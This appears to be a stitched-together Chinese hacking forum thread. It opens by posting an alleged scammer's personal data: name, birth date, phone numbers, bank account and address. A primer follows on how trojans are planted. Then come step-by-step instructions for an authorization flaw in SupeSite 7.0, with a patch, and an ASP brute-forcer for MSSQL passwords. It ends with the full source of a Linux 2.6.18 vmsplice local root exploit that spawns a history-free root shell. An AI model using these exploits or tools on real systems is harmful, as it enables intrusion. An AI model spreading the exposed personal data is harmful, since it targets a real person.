返回列表 发帖

公布骗子一名

单选投票, 共有 2 人参与投票
0.00% (0)
100.00% (2)
0.00% (0)
您所在的用户组没有投票权限
PS:内容不是我们撰写、我们只是代为发布
芝麻小叶
QQ:727521891
农行帐号6228481870447450516
姓名:戴源俊   22岁
Q Q 号:78632127
家乡:吉林白山   现居:河北省保定北市区
他用[QQ:861122121黑客中国]这个中介在网上发布承接拿站业务
姓名: 戴源俊 性别: 男 出生年月: 1988-8-20 民族: 汉族 最高学历: 大专 现居住地: 河北省保定市  身    高:175cm
邮 箱:   laiteqz@163.com /zhimaback@yeah.net
手 机:   13733362615
电 话:   0312-6793382
详细地址:吉林省长白朝鲜族自治县 邮政编码:134400
====================
Web服务器: Microsoft-IIS/6.0
IP地址: 222.169.177.27     
IP所在地: 吉林省白山市 电信
===================
域名
sinhack.com
注册人

注册邮箱
zhimaback@yeah.net
===================
联合 一个名叫小凯 写木马的 然后 卖 木马 也是个骗子 专骗域名客服 希望 **能够注意这两个人 域名客服也注意这两个骗子
http://xinnet.com/index.html
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

反黑入门基础 搞懂特洛伊安全辅助工具工作原理
特洛伊木马是具有某些功能或仅仅是有趣的程序。但它通常会做一些令人意想不到的事情,如盗取口令或文件。 特洛伊木马是如何工作的
[/quote]
[quote]  一般的木马程序都包括客户端和服务端两个程序,其申客户端是用于攻击者远程控制植入木马的机器,服务器端程序即是木马程序。攻击者要通过木马攻击你的系统,他所做的第一步是要把木马的服务器端程序植人到你的电脑里面。
  目前木马入侵的主要途径还是先通过一定的方法把木马执行文件弄到被攻击者的电脑系统里,利用的途径有邮件附件、下载软件中等,然后通过一定的提示故意误导被攻击者打开执行文件,比如故意谎称这个木马执行文件,是你朋友送给你贺卡,可能你打开这个文件后,确实有贺卡的画面出现,但这时可能木马已经悄悄在你的后台运行了。一般的木马执行文件非常小,大部分都是几K到几十K,如果把木马捆绑到其他正常文件上,你很难发现,所以,有一些网站提供的软件下载往往是捆绑了木马文件的,你执行这些下载的文件,也同时运行了木马。
  木马也可以通过Script、ActiveX及Asp.CGI交互脚本的方式植入,由于微软的浏览器在执行Senipt脚本存在一些漏洞。攻击者可以利用这些漏洞传播病毒和木马,甚至直接对浏览者电脑进行文件操作等控制。前不久献出现一个利用微软Scripts脚本漏洞对浏览者硬盘进行格式化的HTML页面。如果攻击者有办法把木马执行文件下载到攻击主机的一个可执行WWW目录夹里面,他可以通过编制CGI程序在攻击主机上执行木马目录。此外,木马还可以利用系统的一些漏洞进行植人,如微软著名的US服务器溢出漏洞,通过一个IISHACK攻击程序即可使IIS服务器崩溃,并且同时攻击服务器,执行远程木马执行文件。
  当服务端程序在被感染的机器上成功运行以后,攻击者就可以使用客户端与服务端建立连接,并进一步控制被感染的机器。在客户端和服务端通信协议的选择上,绝大多数木马使用的是TCP/IP协议,但是也有一些木马由于特殊的原因,使用UDP协议进行通讯。当服务端在被感染机器上运行以后,它一方面尽量把自己隐藏在计算机的某个角落里面,以防被用户发现;同时监听某个特定的端口,等待客户端与其取得连接;另外为了下次重启计算机时仍然能正常工作。木马程序一般会通过修改注册表或者其他的方法让自己成为自启动程序。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

SupeSite7.0漏洞 文章编辑任意修改漏洞
GG百度关键字:Powered by SupeSite 7.0
入侵方法:1、注册一个会员,并登录后台 用户名我已注册 vini52、找到一篇您需要入侵的文章,记住该文章的ID号,ID号即为文章的itemid号3、在浏览器地址栏中输入:http://网站的域名/admincp.php?action=spacenews&op=edit&itemid=文章的ID号4、不用多说了吧,您就任意地改吧!任意的添加吧!5、官方已经发布补丁!
漏洞源码分析:源码1106行没有对用户能否修改文章做足够的权限验证导致任意会员可以修改文章上传非法文件!//THE VALUE SHOWif($thevalue) {  //缩略图 //CUSTOM FIELD if($page == 1) {  $isuid = 0;      $cfhtmlselect = array('0'=>$alang['space_customfield_none']);    $wheresqlarr = array();  $wheresqlarr['type'] = $type;  $plussql = 'ORDER BY displayorder';  $allcfarr = selecttable('customfields', array(), $wheresqlarr, $plussql);    $cfhtml = '';  $tbodynum = 0;  foreach ($allcfarr as $cfkey => $cfvalue) {   if(empty($thevalue['customfieldid'])) {    if($cfvalue['isdefault']) {     $thevalue['customfieldid'] = $cfvalue['customfieldid'];    }   }   $cfhtmlselect[$cfvalue['customfieldid']] = $cfvalue['name'];   $cfarr = unserialize($cfvalue['customfieldtext']);   if(is_array($cfarr) &amp;&amp; $cfarr) {    if(!empty($thevalue['customfieldid']) &amp;&amp; $thevalue['customfieldid'] == $cfvalue['customfieldid']) {     $tbodydisplay = '';     if(empty($thevalue['customfieldtext'])) {      $thecfarr = array();     } else {      $thecfarr = unserialize($thevalue['customfieldtext']);     }    } else {     $tbodydisplay = 'none';     $thecfarr = array();    }    $tbodynum++;    $cfhtml .= '<tbody id="cf_'.$tbodynum.'" style="display:'.$tbodydisplay.'">';        foreach ($cfarr as $ckey => $cvalue) {     $inputstr = '';     if(empty($thecfarr[$ckey])) $thecfarr[$ckey] = '';     $cfoptionarr = array();     if($cvalue['type'] == 'select' || $cvalue['type'] == 'checkbox') {      $cfoptionstr = $cvalue['option'];      $coarr = explode("
", $cfoptionstr);      $coarr = sarray_unique($coarr);      foreach ($coarr as $covalue) {       $covalue = trim($covalue);       $cfoptionarr[$covalue] = $covalue;      }     }     switch ($cvalue['type']) {      case 'input':       $inputstr = '<input name="customfieldtext['.$cfvalue['customfieldid'].']['.$ckey.']" type="text" size="30" value="'.$thecfarr[$ckey].'" />';       break;      case 'textarea':       $inputstr = '<textarea name="customfieldtext['.$cfvalue['customfieldid'].']['.$ckey.']" rows="5" cols="60">'.$thecfarr[$ckey].'</textarea>';       break;      case 'select':       $inputstr = getselectstr('customfieldtext['.$cfvalue['customfieldid'].']['.$ckey.']', $cfoptionarr, $thecfarr[$ckey]);       break;      case 'checkbox':       $inputstr = getcheckboxstr('customfieldtext['.$cfvalue['customfieldid'].']['.$ckey.']', $cfoptionarr, $thecfarr[$ckey]);       break;     }     $cfhtml .= '<tr><th>'.$cvalue['name'].'</th><td>'.$inputstr.'</td></tr>';    }    $cfhtml .= '</tbody>';   }  }
详细利用过程请看视频!
漏洞修补办法1、关闭网站自动审核的功能,可防止被恶意修改后的文章在前台显示出来。但仍然无法阻止文章被他人恶意修改,且无法恢复。此方法不用修改任何源码。2、修改admin/admin_spacenews.php的代码,此方法可以禁止别人的入侵。首先找到:if($thevalue) {
在核心块中添加一段判断代码,修改后变成:if($thevalue) {
if (($isuid) &amp;&amp; ($_SGLOBAL['supe_uid'] != $thevalue['uid']) &amp;&amp; ($_GET['op'] == 'edit')) {
showmessage('submit_invalid_error');
}漏洞视频:http://www.sitedir.com.cn/video/ss7.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

[asp提权]MSSQLCracker in ASP
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



put(appCommon.toUploadPic('',null,null,1,10,'no'));
*//'=================


<%'============ ASP Port Scanner by lake2 ==================='http://lake2.0x54.org'Version: 0.1'For SpringBoard'==========================================================


%> <style type="text/css"> body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;} body {background-color: #ffffff;font-size:14px; } a:link {color: #0000FF;text-decoration: none;} a:visited {text-decoration: none;color: #0000FF;} a:hover {text-decoration: none;color: #FF0000;} a:active {text-decoration: none;color: #FF0000;} .buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5} .TextBox {border: 1px solid #084B8E} .styleRed {color: #FF0000} </style> <title>MSSQL Cracker for SpringBoard</title> <% Dim Password() If Request.Form("go") <> "1" Then %>     <div align="center">Welcome to lake2.0x54.org </div>     <form name="form1" method="post" action="" onSubmit="form1.Submit.disabled=true;">      ConnStr:      <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70">      <br>      Char:           <input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30">    <br> Length:   <input name="len" type="text" class="TextBox" id="len" value="3" size="4"> <br> Path:      <input name="path" type="text" class="TextBox" value="<%=Server.MapPath("r.txt")%>" size="50"> <input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked> Enablel<br> <input name="go" type="hidden" id="go" value="1"> <br> <input name="Submit" type="submit" class="buttom" id="Submit" value=" Run "> </form> <% Else     timer1 = timer     Server.ScriptTimeout = 7776000     ConnStr = Request.Form("Conn")     Char = request.Form("char")     LenChar = Len(Char)     ReDim password(LenChar)     For i = 1 to LenChar     password(i) = Mid(Char, i, 1)     Next     length = CInt(request.Form("len"))     Call LAKE("")     response.Write "Done!<br>Process " &amp; tTime &amp; " s"     If request.Form("CFile") <> "" Then CreateResult("Done!" &amp; vbcrlf &amp; tTime) End If Sub LAKE(str)     If Len(str) >= length Then Exit Sub     For j = 1 to LenChar     pass = str &amp; password(j)     If Len(pass) = length Then Call Crack(pass)     Call LAKE(pass)     Next End Sub Sub Crack(str)     On Error Resume Next     Set conn = Server.CreateObject("ADODB.connection")     conn.open Replace(ConnStr,"{PASS}",str)     If Err Then     If Err.Number <> -2147217843 Then     response.Write(Err.Description &amp; "<BR>")     response.End()     End If     Else     response.Write("I Get it ! Password is <font color=red>" &amp; str &amp; "</font><BR>Process " &amp; tTime &amp; " s")     If request.Form("CFile") <> "" Then CreateResult(str &amp; vbcrlf &amp; tTime)     response.End()     End If End Sub Function tTime()     timer2 = timer     thetime=cstr(int(timer2-timer1))     tTime = thetime End Function Sub CreateResult(t)     Set fs = CreateObject("Scripting.FileSystemObject")     Set outfile = fs.CreateTextFile(request.Form("path"))     outfile.WriteLine t     Set fs = Nothing End Sub %></TABLE>
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



put(appCommon.toUploadPic('',null,null,1,10,'no'));
*//'=================</TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

LINUX 2.6.18-238 local root exp
/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                        
* 0     _                   __           __       __                     1
* 1   /'             __  /'__`        / \__  /'__`                   0
* 0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
* 1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
* 0       / /    /   / \__/  \_  \_   /           1
* 1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
* 0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
* 1                   \____/ >> Exploit database separated by exploit   0
* 0                   /___/          type (local, remote, DoS, etc.)    1
* 1                                                                      0
* 0  2.6.18 Modified By CrosS                                                            1
* 1                                                                      0
* 0  Linux 2011                                                          1
* 1                                                                      0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18 Previously Coded by "Angel Injection" , couple of thanks for this, but
*
* it had errors while compiling, so this is modified version of this exploit
*
* working fine . Usage is given below..
*
* gcc -o exploit exploit.c
* chmod 777 exploit
* ./exploit
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... &amp; all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS   16
#define PG_compound   14
#define uint      unsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)   (x + sizeof(x) - 40)

struct page {
   unsigned long flags;
   int count;
   int mapcount;
   unsigned long private;
   void *mapping;
   unsigned long index;
   struct { long next, prev; } lru;
};

void   exit_code();
char   exit_stack[1024 * 1024];

void   die(char *msg, int err)
{
   printf(err ? "[-] %s: %s
" : "[-] %s
", msg, strerror(err));
   fflush(stdout);
   fflush(stderr);
   exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS      0x73
#define USER_SS      0x7b
#define USER_FL      0x246

static_inline
void   exit_kernel()
{
   __asm__ __volatile__ (
   "movl %0, 0x10(%%esp) ;"
   "movl %1, 0x0c(%%esp) ;"
   "movl %2, 0x08(%%esp) ;"
   "movl %3, 0x04(%%esp) ;"
   "movl %4, 0x00(%%esp) ;"
   "iret"
   : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
       "i" (USER_CS), "r" (exit_code)
   );
}

static_inline
void *   get_current()
{
   unsigned long curr;
   __asm__ __volatile__ (
   "movl %%esp, %%eax ;"
   "andl %1, %%eax ;"
   "movl (%%eax), %0"
   : "=r" (curr)
   : "i" (~8191)
   );
   return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS      0x23
#define USER_SS      0x2b
#define USER_FL      0x246

static_inline
void   exit_kernel()
{
   __asm__ __volatile__ (
   "swapgs ;"
   "movq %0, 0x20(%%rsp) ;"
   "movq %1, 0x18(%%rsp) ;"
   "movq %2, 0x10(%%rsp) ;"
   "movq %3, 0x08(%%rsp) ;"
   "movq %4, 0x00(%%rsp) ;"
   "iretq"
   : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
       "i" (USER_CS), "r" (exit_code)
   );
}

static_inline
void *   get_current()
{
   unsigned long curr;
   __asm__ __volatile__ (
   "movq %%gs:(0), %0"
   : "=r" (curr)
   );
   return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice   __NR_vmsplice
_syscall4(
   long, _vmsplice,
   int, fd,
   struct iovec *, iov,
   unsigned long, nr_segs,
   unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)   syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void   kernel_code()
{
   int   i;
   uint   *p = get_current();

   for (i = 0; i < 1024-13; i++) {
      if (p[0] == uid &amp;&amp; p[1] == uid &amp;&amp;
          p[2] == uid &amp;&amp; p[3] == uid &amp;&amp;
          p[4] == gid &amp;&amp; p[5] == gid &amp;&amp;
          p[6] == gid &amp;&amp; p[7] == gid) {
         p[0] = p[1] = p[2] = p[3] = 0;
         p[4] = p[5] = p[6] = p[7] = 0;
         p = (uint *) ((char *)(p + 8) + sizeof(void *));
         p[0] = p[1] = p[2] = ~0;
         break;
      }
      p++;
   }   

   exit_kernel();
}

void   exit_code()
{
   if (getuid() != 0)
      die("wtf", 0);

   printf("[+] root
");
   putenv("HISTFILE=/dev/null");
   execl("/bin/bash", "bash", "-i", NULL);
   die("/bin/bash", errno);
}

int   main(int argc, char *argv[])
{
   int      pi[2];
   size_t      map_size;
   char *      map_addr;
   struct iovec   iov;
   struct page *   pages[5];

   uid = getuid();
   gid = getgid();
   setresuid(uid, uid, uid);
   setresgid(gid, gid, gid);

   if (!uid || !gid)
      die("!@#$", 0);

   /*****/
   pages[1] = pages[0] + 1;

   map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                   MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (map_addr == MAP_FAILED)
      die("mmap", errno);

   memset(map_addr, 0, map_size);
   printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
   printf("[+] page: 0x%lx
", pages[0]);
   printf("[+] page: 0x%lx
", pages[1]);

   pages[0]->flags    = 1 << PG_compound;
   pages[0]->private  = (unsigned long) pages[0];
   pages[0]->count    = 1;
   pages[1]->lru.next = (long) kernel_code;

   /*****/
   pages[2] = *(void **) pages[0];
   pages[3] = pages[2] + 1;

   map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                   MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (map_addr == MAP_FAILED)
      die("mmap", errno);

   memset(map_addr, 0, map_size);
   printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
   printf("[+] page: 0x%lx
", pages[2]);
   printf("[+] page: 0x%lx
", pages[3]);

   pages[2]->flags    = 1 << PG_compound;
   pages[2]->private  = (unsigned long) pages[2];
   pages[2]->count    = 1;
   pages[3]->lru.next = (long) kernel_code;

   /*****/
   map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                   MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (map_addr == MAP_FAILED)
      die("mmap", errno);
   memset(map_addr, 0, map_size);
   printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
   printf("[+] page: 0x%lx
", pages[4]);

   /*****/
   map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (map_addr == MAP_FAILED)
      die("mmap", errno);

   memset(map_addr, 0, map_size);
   printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);

   /*****/
   if (pipe(pi) < 0) die("pipe", errno);
   close(pi[0]);

   iov.iov_base = map_addr;
   iov.iov_len  = ULONG_MAX;

   signal(SIGPIPE, exit_code);
   _vmsplice(pi[1], &amp;iov, 1, 0);
   die("vmsplice", errno);
   return 0;
}


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表